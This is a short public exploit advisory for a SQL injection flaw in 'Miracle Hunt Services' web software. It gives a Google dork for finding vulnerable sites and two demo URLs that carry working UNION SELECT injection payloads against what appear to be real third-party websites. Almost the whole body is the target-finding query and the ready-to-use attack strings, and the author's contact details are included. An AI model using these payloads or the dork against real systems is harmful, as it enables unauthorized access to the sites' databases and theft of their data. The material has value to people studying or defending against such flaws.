********************************************************* #Exploit Title: Miracle Hunt Services - Sql Injection Vulnerability #Date: 2022-04-15 #Exploit Author: Behrouz Mansoori #Google Dork: "Managed By Miracle Hunt Services" #Category:webapps #Tested On: windows 10, Firefox Proof of Concept: Search google Dork: "Managed By Miracle Hunt Services" ### Demo : https://amazingexperts.in/product_details.php?id=-29%27%20union%20select%201,2,version(),4,5,6,7,8,9,10--+ https://www.sicurocab.com/product_details.php?id=-2%27%20union%20select%201,2,3,version(),5,6,7,8,9--+ ********************************************************* #Discovered by: Behrouz mansoori #Instagram: Behrouz_mansoori #Email: mr.mansoori@yahoo.com *********************************************************